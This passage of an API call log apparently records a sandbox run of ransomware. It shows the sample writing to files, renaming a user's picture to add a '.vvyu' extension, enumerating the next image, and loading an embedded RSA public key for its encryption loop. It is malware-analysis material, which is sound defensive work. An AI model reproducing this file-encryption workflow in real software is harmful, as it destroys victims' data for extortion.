lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0195.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d427c0 | out: hHeap=0x6a0000) returned 1 [0195.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.685] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xfe86, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xfe86, lpOverlapped=0x0) returned 1 [0195.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0195.686] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfe8b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.686] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.688] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.688] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.689] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.689] CloseHandle (hObject=0x52c) returned 1 [0195.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0195.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d2cc80 [0195.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.691] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\9GFEdyG-XmCwzgAwdH.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\9gfedyg-xmcwzgawdh.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\9GFEdyG-XmCwzgAwdH.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\9gfedyg-xmcwzgawdh.bmp.vvyu")) returned 1 [0195.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.694] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.697] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d2b700, ftCreationTime.dwHighDateTime=0x1d899e2, ftLastAccessTime.dwLowDateTime=0xbe9b4680, ftLastAccessTime.dwHighDateTime=0x1d8a2e4, ftLastWriteTime.dwLowDateTime=0xbe9b4680, ftLastWriteTime.dwHighDateTime=0x1d8a2e4, nFileSizeHigh=0x0, nFileSizeLow=0xf33f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hM HT 9rGnc6u.gif", cAlternateFileName="HMHT9R~1.GIF")) returned 1 [0195.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.698] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\hM HT 9rGnc6u.gif") returned=".gif" [0195.698] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\hM HT 9rGnc6u.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\hm ht 9rgnc6u.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.699] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=62271) returned 1 [0195.699] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.702] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xf319, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.702] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.705] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.705] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf33f, lpOverlapped=0x0) returned 1 [0195.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.707] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.707] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.708] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.708] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.708] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.708] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.708] GetLastError () returned 0x0 [0195.709] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.709] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.709] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.709] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.709] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf340) returned 0x2d4b778 [0195.710] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d427c0 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42808 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.711] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a198 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.713] HeapFree (in: hHeap=0x6a0000, 